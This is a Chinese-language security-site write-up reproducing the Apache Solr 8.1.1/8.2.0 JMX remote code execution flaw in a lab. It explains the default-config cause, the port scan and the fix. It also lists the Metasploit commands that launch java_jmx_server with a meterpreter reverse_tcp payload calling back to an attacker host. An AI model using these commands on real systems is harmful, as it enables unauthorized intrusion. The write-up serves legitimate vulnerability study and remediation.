1. 黑客安全网-互联网安全媒体信息综合平台首页
  2. 漏洞信息

Apache Solr JMX服务 RCE 漏洞复现

0x00简介

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

 

漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。

  Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS=”true”选项。

如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983),

并且无需进行任何身份验证。 如果防火墙中的入站流量打开了此端口,则具有Solr节点网络访问权限的任何人都将能够访问JMX,

  并且可以上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本的Linux用户。

0x01影响版本

Apache Solr8.1.1版本上线时间:2019-05-28

Apache Solr8.2.0版本上线时间:2019-07-25

0x02漏洞危害

  如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。

0x03环境搭建

Java环境和kali系统、Solr 8.20

Solr 8.20 下载地址:

wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

Apache Solr JMX服务 RCE 漏洞复现

使用unzip solr-8.2.0.zip解压

Apache Solr JMX服务 RCE 漏洞复现

解压完成后,切换到bin目录启动Solr

./solr  start  -force

Apache Solr JMX服务 RCE 漏洞复现

启动后访问:http://192.168.10.176:8983/

Apache Solr JMX服务 RCE 漏洞复现

 

0x04漏洞复现

攻击机:kali IP:192.168.10.147

受害机:Ubuntu18.6中docker IP:192.168.10.184:8983

 

1、使用nmap扫描端口后发现18983端口开启

Apache Solr JMX服务 RCE 漏洞复现

 

2、使用Metasploit中的exploit/multi/misc/java_jmx_server模块进行漏洞复现

Ø use exploit/multi/misc/java_jmx_server

Ø set RHOST 192.168.10.184

Ø set RPORT 18983

Apache Solr JMX服务 RCE 漏洞复现

再来设置payload:java/meterpreter/reverse_tcp

Ø set payload java/meterpreter/reverse_tcp

Ø set LHOST 192.168.10.147

Ø set LPORT  4444

Apache Solr JMX服务 RCE 漏洞复现

3、使用run执行,即可看到成功建立连接

Apache Solr JMX服务 RCE 漏洞复现

0x05修复建议

将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。

相关推荐: 挖洞经验 | 利用Android Studio发现安卓应用漏洞($3000)

本文讲述了作者在一次一次授权安全测试中,利用安卓平台集成开发环境Android Studio发现APP客户端身份验证绕过漏洞,获取用户密码。漏洞最终获得了APP官方总计$3000的奖励,一起来看看。 漏洞背景 为了更好的解释漏洞发现,我先简单介绍一下目标测试A…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/vuls/3154.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注